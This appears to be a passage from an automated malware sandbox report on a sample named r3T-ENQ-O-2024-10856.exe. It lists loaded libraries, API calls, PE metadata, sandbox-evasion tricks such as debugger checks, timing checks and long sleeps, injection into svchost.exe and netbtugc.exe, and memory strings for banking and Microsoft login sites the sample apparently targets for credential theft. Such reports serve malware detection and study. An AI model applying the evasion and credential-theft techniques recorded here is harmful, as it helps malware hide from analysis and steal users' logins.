            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: r3T-ENQ-O-2024-10856.exe Static file information: File size 1225728 > 1048576
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rYmePGTGlPk.exe, 00000005.00000002.3345960481.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3345962314.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: r3T-ENQ-O-2024-10856.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000E20F6 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000A7795 push ecx; ret 0_2_000A77A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038A883 push FFFFFFC7h; retf 2_2_0038AA9A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003836B0 push eax; ret 2_2_003836B2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038AEA4 push cs; retf 2_2_0038AEAC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_003887F2 push ecx; iretd 2_2_003887FB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B1225F pushad ; ret 2_2_00B127F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B127FA pushad ; ret 2_2_00B127F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B1283D push eax; iretd 2_2_00B12858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B409AD push ecx; mov dword ptr [esp], ecx 2_2_00B409B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B11200 push eax; iretd 2_2_00B11369
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B19939 push es; iretd 2_2_00B19940
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_039309AD push ecx; mov dword ptr [esp], ecx 6_2_039309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0320513F push ecx; iretd 6_2_03205148
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0322017D push ebp; ret 6_2_032201F3
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0321D1B3 push ebx; iretd 6_2_0321D1C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_032071D0 push FFFFFFC7h; retf 6_2_032073E7
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_032110B0 push es; retf 6D50h 6_2_0321119D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_032077F1 push cs; retf 6_2_032077F9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03220AAF push es; iretd 6_2_03220AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03220ACF push ds; iretd 6_2_03220AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0320DDB9 push ss; rep ret 6_2_0320DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0320DDC3 push ss; rep ret 6_2_0320DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03223C70 push edi; iretd 6_2_03223C7B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0381638E push cx; retf 6_2_03816390
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0381D23A pushad ; ret 6_2_0381D23C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_038170C9 push es; retf 6_2_038170D5
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_038150E3 push 86FB9775h; ret 6_2_038150EA
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_0381EFC8 push ebx; iretd 6_2_0381F03E
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03815D94 push es; iretd 6_2_03815DA6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03815D22 pushad ; iretd 6_2_03815D23
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03815CFE push ecx; retf 6_2_03815D06
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_0009F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000A1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe API/Special instruction interceptor: Address: A52BFC
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B8096E rdtsc
            Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 4733
            Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 5239
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Evaded block: after key decision graph_0-109169
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Evaded block: after key decision graph_0-109985
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Evaded block: after key decision graph_0-109226
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe API coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032 Thread sleep count: 4733 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032 Thread sleep time: -9466000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032 Thread sleep count: 5239 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5032 Thread sleep time: -10478000s >= -30000s
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe TID: 5228 Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_0009DD92 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CFD47 FindFirstFileW,FindClose,0_2_000CFD47
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_000CFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0321C0D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0321C0D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_0009E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0009E47B
            Source: 1m0Sa73J8.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 1m0Sa73J8.6.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: 1m0Sa73J8.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 1m0Sa73J8.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 1m0Sa73J8.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 1m0Sa73J8.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 1m0Sa73J8.6.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 1m0Sa73J8.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: rYmePGTGlPk.exe, 00000007.00000002.3346469113.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2941828848.0000027B7AD4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 1m0Sa73J8.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 1m0Sa73J8.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 1m0Sa73J8.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 1m0Sa73J8.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 1m0Sa73J8.6.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 1m0Sa73J8.6.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 1m0Sa73J8.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9(
            Source: 1m0Sa73J8.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 1m0Sa73J8.6.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 1m0Sa73J8.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 1m0Sa73J8.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B8096E rdtsc 2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00397703 LdrLoadDll, 2_2_00397703
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000D703C BlockInput, 0_2_000D703C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_0008374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 0_2_0008374E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000B46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_000B46D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_000E20F6 LoadLibraryA,GetProcAddress, 0_2_000E20F6
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_00A51818 mov eax, dword ptr fs:[00000030h] 0_2_00A51818
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_00A52EC8 mov eax, dword ptr fs:[00000030h] 0_2_00A52EC8
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe Code function: 0_2_00A52E68 mov eax, dword ptr fs:[00000030h] 0_2_00A52E68
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B380A0 mov eax, dword ptr fs:[00000030h] 2_2_00B380A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD80A8 mov eax, dword ptr fs:[00000030h] 2_2_00BD80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B4208A mov eax, dword ptr fs:[00000030h] 2_2_00B4208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3C0F0 mov eax, dword ptr fs:[00000030h] 2_2_00B3C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B820F0 mov ecx, dword ptr fs:[00000030h] 2_2_00B820F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_00B3A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC60E0 mov eax, dword ptr fs:[00000030h] 2_2_00BC60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B480E9 mov eax, dword ptr fs:[00000030h] 2_2_00B480E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC20DE mov eax, dword ptr fs:[00000030h] 2_2_00BC20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C060B8 mov eax, dword ptr fs:[00000030h] 2_2_00C060B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C060B8 mov ecx, dword ptr fs:[00000030h] 2_2_00C060B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BD6030 mov eax, dword ptr fs:[00000030h] 2_2_00BD6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3A020 mov eax, dword ptr fs:[00000030h] 2_2_00B3A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3C020 mov eax, dword ptr fs:[00000030h] 2_2_00B3C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h] 2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h] 2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h] 2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B5E016 mov eax, dword ptr fs:[00000030h] 2_2_00B5E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC4000 mov ecx, dword ptr fs:[00000030h] 2_2_00BC4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE2000 mov eax, dword ptr fs:[00000030h] 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B6C073 mov eax, dword ptr fs:[00000030h] 2_2_00B6C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B42050 mov eax, dword ptr fs:[00000030h] 2_2_00B42050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC6050 mov eax, dword ptr fs:[00000030h] 2_2_00BC6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C061C3 mov eax, dword ptr fs:[00000030h] 2_2_00C061C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C061C3 mov eax, dword ptr fs:[00000030h] 2_2_00C061C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h] 2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h] 2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h] 2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BC019F mov eax, dword ptr fs:[00000030h] 2_2_00BC019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3A197 mov eax, dword ptr fs:[00000030h] 2_2_00B3A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3A197 mov eax, dword ptr fs:[00000030h] 2_2_00B3A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B3A197 mov eax, dword ptr fs:[00000030h] 2_2_00B3A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00C161E5 mov eax, dword ptr fs:[00000030h] 2_2_00C161E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BFC188 mov eax, dword ptr fs:[00000030h] 2_2_00BFC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BFC188 mov eax, dword ptr fs:[00000030h] 2_2_00BFC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00B80185 mov eax, dword ptr fs:[00000030h] 2_2_00B80185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE4180 mov eax, dword ptr fs:[00000030h] 2_2_00BE4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00BE4180 mov eax, dword ptr fs:[00000030h] 2_2_00BE4180
